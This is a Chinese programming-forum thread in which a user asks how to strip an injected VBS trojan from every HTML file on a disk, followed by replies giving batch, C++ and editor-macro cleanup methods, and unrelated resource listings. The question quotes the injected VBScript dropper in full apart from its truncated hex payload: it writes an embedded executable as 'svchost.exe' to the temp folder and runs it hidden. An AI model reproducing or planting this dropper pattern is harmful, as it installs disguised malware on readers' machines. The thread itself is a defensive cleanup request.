求批量快速清除全盘JS代码的方法,电脑中了vbs木马,所有html都被植入代码

meng014131 2015-12-20 04:52:41

电脑中了VBS木马,电脑所有html文件都被植入代码。用360杀毒,只能清除部分文件,还有很多没被清除,


<SCRIPT Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C4..........此处数万代码"

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath)=False Then

Set FileObj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step 2

FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

Next

FileObj.Close

End If

Set WSHshell = CreateObject("WScript.Shell")

WSHshell.Run DropPath, 0

//--></SCRIPT>




很多批量清除软件,查找的字符字数限制,求批量匹配清除代码或工具,VB。bat ..都行,哪种快来哪种,

比如批量查找替换

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"通配符WSHshell.Run DropPath, 0
//--></SCRIPT>

是全盘哦
谢谢
...全文
1557 3 打赏 收藏 转发到动态 举报
写回复
用AI写文章
3 条回复
切换为时间正序
请发表友善的回复…
发表回复
赵4老师 2015-12-21
  • 打赏
  • 举报
 回复
仅供参考: 

//ListDrivers.cpp
#include "stdafx.h"
using namespace std;
struct {
   UINT type;           LPCSTR name;
} DriveTypeFlags [] = {// GetDriveType返回码与人可读字符串对照表
   {DRIVE_UNKNOWN     ,"未知"        },
   {DRIVE_NO_ROOT_DIR ,"无效路经"    },
   {DRIVE_REMOVABLE   ,"可移动"      },
   {DRIVE_FIXED       ,"固定"        },
   {DRIVE_REMOTE      ,"网络驱动器"  },
   {DRIVE_CDROM       ,"CD-ROM"      },
   {DRIVE_RAMDISK     ,"随机存取磁盘"},
   {0                 , NULL         },
};
int _tmain() {
    if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0)) {
        cerr << _T("Fatal Error: MFC initialization failed") << endl;
        return -1;
    }

   // 获取逻辑驱动器字符串- a:\<null>b:\<null>c:\<null>...z:\<null><null>
   // 还可以用GetLogicalDrives以位图形式代替字符串形式获取信息
    TCHAR buf[200];
    DWORD len = GetLogicalDriveStrings(sizeof(buf)/sizeof(TCHAR),buf);

    string msg = "逻辑驱动器:\n";
    for (TCHAR* s=buf; *s; s+=_tcslen(s)+1) {
        LPCTSTR sDrivePath = s;
        msg += sDrivePath;
        msg += " ";
        UINT uDriveType = GetDriveType(sDrivePath);
        for (int i=0; DriveTypeFlags[i].name; i++) {
            if (uDriveType == DriveTypeFlags[i].type) {
                msg += DriveTypeFlags[i].name;
                break;//
            }
        }
        msg += '\n';
    }
    cout << msg.c_str();
    return 0;
}
TimeAllJS.bat: 

rem Trim All js
del c:\alljsfiles.txt
ListDrives.exe | find "固定" >c:\allfixdrives.txt
FOR /F "tokens=1" %%i IN (c:\allfixdrives.txt) DO dir %%i*.js /b /s /a-d >>c:\alljsfiles.txt
TrimJS c:\alljsfiles.txt
TrimJS是你自己写的读取命令行参数文件中每行一个全路径文件名对应文件,将其中植入代码删除后保存回去的小程序。 运行批处理TimeAllJS.bat
Tiger_Zhao 2015-12-21
  • 打赏
  • 举报
 回复
一种半手工的方法:
用 TextPad,先用“在文件中搜索”功能把相关的文件全盘都找出来,然后在搜索结果窗口中,录制这样一个宏:
--------
方向键向下
回车——打开文件并定为到搜索位置,[b]接下来在文件窗口中[b]
查找 //--></SCRIPT>,并且选中选项“扩展选择”
删除选中内容
保存文件
关闭文件窗口——又回到了结果窗口
--------
接下来就是手工不停地按 Ctrl+R 执行宏,就会逐个文件进行替换保存了。
meng014131 2015-12-21
  • 打赏
  • 举报
 回复
谢谢楼上解答 ,我已经用小工具清理 了。 中此木马的网友可参考: 用护卫神网页木马清理工具【试过很多软件就这个好点】完全免费的 不过木马代码太长的要分几次清理【我就分了四次,不过速度快】,很少有软件支持一次性替换数百行的,这软件查找速度快,不像其它软件,直接查找一个盘会崩溃假死。 注意:要用官网最新版的,旧版的清理UTF-8的会乱码。先测试清理几个文件【gbk和UTF-8的都试下】,正常了再清理全盘,注意备份,否则乱码了就恢复不了,查找代码不要粘贴太长,越短速度越快,查找到后再更换长代码替换 适合完全不懂编程的菜鸟
围绕审计日志查询平台设计Java后端闭环
标题:围绕审计日志查询平台设计Java后端闭环 内容概要:从服务拆分、状态流转、失败重试和监控告警出发,介绍围绕审计日志查询平台设计Java后端闭环的设计思路。 24直播网:m.ntzhixue.com 24直播网:hailang88.com 24直播网:zhidanguanjia.com 24直播网:kanchashejigongsi.com 24直播网:m.hailang88.com
基于三重移相控制的双有源桥 DAB 高频隔离 DC-DC 变换器仿真模型研究(Simulink仿真实现)
内容概要:本文围绕基于三重移相控制(TPS)的双有源桥(DAB)高频隔离DC-DC变换器开展系统性研究,重点构建了其在Simulink环境下的高精度仿真模型。研究全面涵盖SPS单相移相、DPS双重重移相与TPS三重移相等多种控制策略的建模、实现与性能对比,深入分析不同模式下变换器的功率传输特性、软开关实现条件及功率回流问题,旨在提升DAB在交直流混合微电网、能量路由器、多端口柔性互联装置等场景的转换效率与动态响应能力。通过对ZVS(零电压切换)条件的精确控制与移相角参数的优化,有效降低了开关损耗,增强了系统整体能效与运行稳定性。该仿真模型具有良好的可扩展性,适用于复杂电能转换系统的科研验证与工程开发。; 适合人群:电力电子、电气工程及其自动化等相关专业的硕士研究生、博士生、科研人员以及从事新能源变换器、柔性输配电系统设计的工程技术人员。; 使用场景及目标:①掌握双有源桥DAB变换器的基本工作原理及其在高频隔离场合的核心优势;②深入理解三重移相控制策略的设计机理、控制自由度分配及其在效率优化的关键作用;③构建并调试可用于科研论文撰写、项目申报或实际系统验证的高保真Simulink仿真模型,支撑理论分析与实验对比。; 阅读建议:建议结合MATLAB/Simulink平台进行动手实践,重点关注主电路拓扑搭建、移相控制模块设计、驱动信号时序配置及ZVS实现条件的仿真观测,推荐通过对比SPS、DPS与TPS三种模式的稳态与动态响应曲线,深入掌握各控制策略的适用边界与优化方向。
高效绘制多管脚芯片:智能栅格插入法
管脚信息表格
窗户干净脏污分类窗户清洁状态分类数据集3299张2类别已划分训练验证测试集.md
【重要提示】本资源设置为0积分下载,若非0积分请勿轻易下载 亲爱的CSDN用户: 首先感谢你点进这个资源页面。我需要提前说明一个重要情况: 本资源原本已设置为“0积分下载”,即作者希望完全免费共享。但CSDN平台有时会根据文件的下载热度、文件大小、用户权限等因素,自动将部分资源的积分调整为非0数值(如1积分、2积分、5积分等)。这是平台系统的自动行为,而非作者本人的设定。 因此,如果你当前看到该资源的下载所需积分不是0(例如显示为1、2、3……),请谨慎决定是否下载。 如果你按照非0积分支付并下载后发现资源内容不符合预期、链接失效,或者实际上该资源本应是免费的,作者无法为此承担积分损失或退还操作。强烈建议:仅在页面显示为0积分时进行下载。 另外,本资源描述并未直接提供具体的下载地址或外部链接,因为它本身是一个通过CSDN官方上传通道提交的文件/内容包。如果你看到描述没有外部网盘地址,这是正常的——资源文件应通过CSDN内置的“下载”按钮获取。若因平台积分显示异常导致你支付了积分,请优先联系CSDN客服咨询积分退还政策,作者没有权限修改平台自动设定的积分值。 感谢你的理解与支持。技术分享本应开放,但受限于平台规则,特此提醒如上。祝学习进步!
音频开发基于JL701N芯片的LE Audio音箱开发指南:蓝牙协议栈与音频算法集成设计
内容概要:本课件系统讲解了基于JL701N芯片的LE Audio音箱开发技术,涵盖SOC架构、源码结构、任务调度、启动流程、功能与蓝牙配置、UI及驱动开发、蓝牙与LE Audio协议栈(包括BIS广播、CIS连接、Auracast公共广播)以及音频算法(如EQ均衡、CVP语音处理、空间音效等)。重点介绍了LE Audio核心技术如LC3编码、等时信道、双模广播与连接模式,并提供了从硬件初始化到音频流管理的完整开发指导。; 适合人群:具备嵌入式开发基础,从事音频产品开发的1-3年经验工程师,特别是涉及蓝牙音箱、TWS耳机等LE Audio设备研发的技术人员。; 使用场景及目标:①掌握JL701N平台下LE Audio音箱的整体架构与启动机制;②实现UI显示、按键驱动、音频算法集成与蓝牙多模式配置;③开发支持Auracast广播、BIS/CIS音频传输及CVP语音增强功能的产品;④深入理解LE Audio流同步、音视频时序对齐等关键技术。; 阅读建议:结合配套工程源码(2026042518版本)进行实践,重点关注JSON配置文件与C宏定义的映射关系,调试时利用RCSP协议动态调整参数,并参考SDK头文件与demo代码深化对音频流水线和协议栈的理解。
VBA

2,506

社区成员

10,831

社区内容

发帖
与我相关
我的任务
社区描述
VBA(Visual Basic for Applications)是Visual Basic的一种宏语言,是在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。
社区管理员
  • VBA
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章